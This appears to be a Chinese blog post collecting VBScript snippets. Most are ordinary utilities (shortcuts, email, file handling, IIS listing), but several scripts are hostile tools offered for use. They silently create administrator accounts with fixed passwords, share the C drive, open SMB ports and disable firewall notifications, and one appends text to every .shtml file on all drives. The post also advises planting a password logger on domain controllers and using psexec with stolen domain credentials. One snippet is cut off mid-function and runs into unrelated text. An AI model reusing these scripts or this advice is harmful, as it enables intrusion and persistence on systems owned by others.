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VBS脚本常用经典代码收集VBS脚本常用经典代码收集 2010年06月21日  1. 计算   2. 处理文件和文件夹   3.


  1. 计算
  2. 处理文件和文件夹
  3. 管理Windows
  4. 处理Word, Excel, PowerPoint等Office文档
  5. 嵌入网页,驱动dHTML
  6. 编写HTTP通信
  7. 调用系统功能(COM组件),比如说语音说话
  8. 分析HTML, XML
  9. 调用命令行并分析返回结果
  10. 处理图片
  11. 自动化按键
  12. 调用Windows Media Player并管理
  13. 调用Windows Live Messenger并管理
  14. 服务端技术:Active Server Page (ASP)
  15. 脚本病毒
  16. 处理数据库
  set gangzi = WScript.CreateObject("WScript.Shell") strDesktop = gangzi.SpecialFolders("Desktop") set oShellLink = gangzi.CreateShortcut(strDesktop & "\Internet Explorer.lnk") oShellLink.TargetPath = "http://www.fendou.info" oShellLink.Description = "Internet Explorer" oShellLink.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe, 0" oShellLink.Save
  Const ADMINISTRATIVE_TOOLS = 6 Set objShell = CreateObject("Shell.Application") Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS) Set objFolderItem = objFolder.Self Set objShell = WScript.CreateObject("WScript.Shell") strDesktopFld = objFolderItem.Path Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\奋斗Blog.url") objURLShortcut.TargetPath = "http://www.fendou.info/" objURLShortcut.Save
  NameSpace = "http://schemas.microsoft.com/cdo/configuration/" Set Email = CreateObject("CDO.Message") Email.From = "发件@qq.com" Email.To = "收件@qq.com" Email.Subject = "Test sendmail.vbs" Email.Textbody = "OK!" Email.AddAttachment "C:\1.txt" With Email.Configuration.Fields .Item(NameSpace&"sendusing") = 2 .Item(NameSpace&"smtpserver") = "smtp.邮件服务器.com" .Item(NameSpace&"smtpserverport") = 25 .Item(NameSpace&"smtpauthenticate") = 1 .Item(NameSpace&"sendusername") = "发件人用户名" .Item(NameSpace&"sendpassword") = "发件人密码" .Update End With Email.Send
  兼容所有浏览器,使用IE的绝对路径+参数打开,无法用函数得到IE安装路径,只用函数得到了Program Files路径,应该比上面的方法好,但是两种方法都不是绝对的。
  On Error Resume Next Dim fPath strComputer = "." Set objWMIService = GetObject _ ("winmgmts:\" & strComputer & "\root\cimv2") Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'gangzi.exe'") For Each objProcess in colProcessList objProcess.Terminate() Next Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\" & strComputer & "\root\cimv2") Set colDirs = objWMIService. _ ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'") Set objFSO = CreateObject("Scripting.FileSystemObject") For Each objDir in colDirs fPath = objDir.Name & "\gangzi.exe" objFSO.DeleteFile(fPath), True Next
  On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Co = VbCrLf & "路过。。。" For Each i In fso.Drives If i.DriveType = 2 Then GF fso.GetFolder(i & "") End If Next Sub GF(fol) Wh fol Dim i For Each i In fol.SubFolders GF i Next End Sub Sub Wh(fol) Dim i For Each i In fol.Files If LCase(fso.GetExtensionName(i)) = "shtml" Then fso.OpenTextFile(i,8,0).Write Co End If Next End Sub
  On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set gangzis=fso.Drives '取得当前计算机的所有磁盘驱动器 For Each gangzi In gangzis '遍历磁盘 Set TestFile=fso.CreateTextFile(""&gangzi&"\新建文件夹.vbs",Ture) TestFile.WriteLine("By www.gangzi.org") TestFile.Close Next
  set fs = CreateObject("Scripting.FileSystemObject") for each drive in fs.drives fstraversal drive.rootfolder next sub fstraversal(byval this) for each folder in this.subfolders fstraversal folder next set files = this.files for each file in files if file.name = "123.exe" then file.name = "321.exe" next end sub
  On Error Resume Next str="我是笨蛋/qq" Set WshShell=WScript.CreateObject("WScript.Shell") WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+ ","+""""&str&""""+")(close)",0 WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Se rvice=200&sigT=2a39fb276d15586e1114e71f7af38e195148 b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,tru e WScript.Sleep 3000 WshShell.SendKeys "^v" WshShell.SendKeys "%s"
  set fso=createobject("scripting.filesystemobject") qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10) qidong=qidong&"URL=http://www.fendou.info"&Chr(13) &Chr(10) qidong=qidong&"IconFile=C:\WINDOWS\system32\SHELL3 2.dll"&Chr(13)&Chr(10) qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10) Set TestFile=fso.CreateTextFile("qq.url",Ture) TestFile.WriteLine(qidong) TestFile.Close
  Dim fso,TestFile,fileName,drvName,fldName drvName=inputbox("Enter the drive to save to:","Drive letter") fldName=inputbox("Enter the folder name:","Folder name") fileName=inputbox("Enter the name of the file:","Filename") Set fso=CreateObject("Scripting.FileSystemObject") If(fso.FolderExists(drvName&fldName))Then msgbox("Folder exists") Else Set fld=fso.CreateFolder(drvName&fldName) End If Set TestFile=fso.CreateTextFile(drvName&fldName&""&fi leName&".txt",True) TestFile.WriteLine("Hello,World!") TestFile.Close
  Dim fso,TestFile,fileName,drvName,fldName drvName=inputbox("Enter the drive to save to:","Drive letter") fldName=inputbox("Enter the folder name:","Folder name") fileName=inputbox("Enter the name of the file:","Filename") Set fso=CreateObject("Scripting.FileSystemObject") If(fso.FolderExists(drvName&fldName))Then msgbox("Folder exists") Else Set fld=fso.CreateFolder(drvName&fldName) End If If(fso.FileExists(drvName&fldName&""&fileName&".t xt"))Then msgbox("File already exists.") Else Set TestFile=fso.CreateTextFile(drvName&fldName&""&fi leName&".txt",True) TestFile.WriteLine("Hello,World!") TestFile.Close End If
  Dim fso,openFile Set fso=CreateObject("Scripting.FileSystemObject") Set openFile=fso.OpenTextFile("C:\test.txt",2,True) '1表示只读,2表示可写,8表示追加 openFile.Write "Hello World!" openFile.Close
  Dim fso,openFile Set fso=CreateObject("Scripting.FileSystemObject") Set openFile=fso.OpenTextFile("C:\test.txt",1,True) MsgBox(openFile.Read(2)) '如果超出了字符数,不会出错。
  Function Encode(strPass) Dim i, theStr, strTmp For i = 1 To Len(strPass) strTmp = Asc(Mid(strPass, i, 1)) theStr = theStr & Abs(strTmp) Next strPass = theStr theStr = "" Do While Len(strPass) > 16 strPass = JoinCutStr(strPass) Loop For i = 1 To Len(strPass) strTmp = CInt(Mid(strPass, i, 1)) strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp) theStr = theStr & strTmp Next Encode = theStr End Function Function JoinCutStr(str) Dim i, theStr For i = 1 To Len(str) If Len(str) - i = 0 Then Exit For theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2)) i = i + 1 Next JoinCutStr = theStr End Function Function IIf(var, val1, val2) If var = True Then IIf = val1 Else IIf = val2 End If End Function Set mc=GetObject("Winmgmts:").InstancesOf("Win32_Netwo rkAdapterConfiguration") For Each mo In mc If mo.IPEnabled=True Then theStr = mo.MacAddress Exit For End If Next Randomize Encode(theStr) rdnum=Int(10*Rnd+5) Function allRand(n) For i=1 to n Randomize Encode(theStr) temp = cint(25*Rnd) If temp mod 2 = 0 then temp = temp + 97 ElseIf temp VBS每隔3秒自动更换IP并打开网址实例(值得一提的是,下面这个代码中每次打开的网址都是引用同一个IE窗口,也就是每次打开的是覆盖上次打开的窗口,如果需要每次打开的网址都是新窗口,直接使用run就可以了)
  Dim Wsh Set Wsh = WScript.CreateObject("WScript.Shell") Set oIE = CreateObject("InternetExplorer.Application") for i=1 to 5 wsh.run "Rasdial /DISCONNECT",false,1 wsh.run "Rasdial 连接名字 账号 密码",false,1 oIE.Navigate "http://www.ip138.com/?"&i&"" Call SynchronizeIE oIE.Visible = True next Sub SynchronizeIE On Error Resume Next Do While(oIE.Busy) WScript.Sleep 3000 Loop End Sub
  set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) '得到adsi接口,绑定 Set oe=GetObject(os&"/Administrators,group") '属性,admin组 Set od=ob.Create("user","lcx") '建立用户 od.SetPassword "123456" '设置密码 od.SetInfo '保存 Set of=GetObject(os&"/lcx",user) '得到用户 oe.add os&"/lcx"
  这段代码如果保存为1.vbs,在cmd下运行,格式: cscript 1.vbs的话,会在当前系统加一个名字为lcx,密码为123456的管理员。当然,你可以用记事本来修改里边的变量lcx和123456,改成你喜欢的名字和密码值。
  Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsNumeric(obj3w.Name) Then sServerName=Obj3w.ServerComment Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf End If Next WScript.Echo ListAllWeb Set ObjService=Nothing WScript.Quit
  运行cscript 2.vbs后,就会详细列出IIS里的站点ID、描述、及物理目录,是不是代码少很多又方便呢?
  面对域结构的内网,可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码,整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上,如果能搞定其中的一台或几台,放个密码记录器之类,相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了,如何在成千台机器里判断出是哪一台呢?dos命令像net group "domain admins" /domain可以做为一个判断的标准,不过vbs也可以做到的,这仍然属于adsi部份的内容,代码如下:
  只用这两句代码就足够了,运行cscript 3.vbs,会有结果的。当然,无论是dos命令或vbs,你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码,你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell,或你的木马本来就是与桌面交互的,登陆你木马shell的又是域用户,就可以直接运行这些命令了。
  set wsh=createobject("wscript.shell") '创建一个wsh对象 a=wsh.run ("cmd.exe /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps C:\WINNT\system32\inetsrv\httpext.dll C:\WINNT\system32\inetsrv\httpodbc.dll C:\WINNT\system32\inetsrv\ssinc.dll C:\WINNT\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll",0) '加入asp.dll到InProcessIsapiApps中 
  Dim OperationRegistry Set OperationRegistry=WScript.CreateObject("WScript.Sh ell") OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Lsa\forceguest",0 Set wsh3=wscript.createobject("wscript.shell") wsh3.Run "net user helpassistant 123456",0,false wsh3.Run "net user helpassistant /active",0,false wsh3.Run "net localgroup administrators helpassistant /add",0,false wsh3.Run "net start Lanmanworkstation /y",0,false wsh3.Run "net start Lanmanserver /y",0,false wsh3.Run "net start ipc$",0,True wsh3.Run "net share c$=c:",0,false wsh3.Run "netsh firewall set notifications disable",0,True wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false 
  Digital=time hours=Hour(Digital) minutes=Minute(Digital) seconds=Second(Digital) if (hours=6) then dn="早上好!" end if if (hours>12) then dn="下午好!" end if if (hours>18) then dn="晚上好!" end if if (hours>22) then dn="不早了,夜深了,该睡觉了!" end if if (minutes<=9) then minutes="0" & minutes end if if (seconds<=9) then seconds="0" & seconds end if ctime=hours & ":" & minutes & ":" & seconds & " " & dn Msgbox ctime 
  Dim OperationRegistry , mynum Set OperationRegistry=WScript.CreateObject("WScript.Sh ell") mynum = 9 mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYST EM\CurrentControlSet\Control\Lsa\forceguest") MsgBox("before forceguest = "&mynum) OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Lsa\forceguest",0 mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYST EM\CurrentControlSet\Control\Lsa\forceguest") MsgBox("after forceguest = "&mynum) 
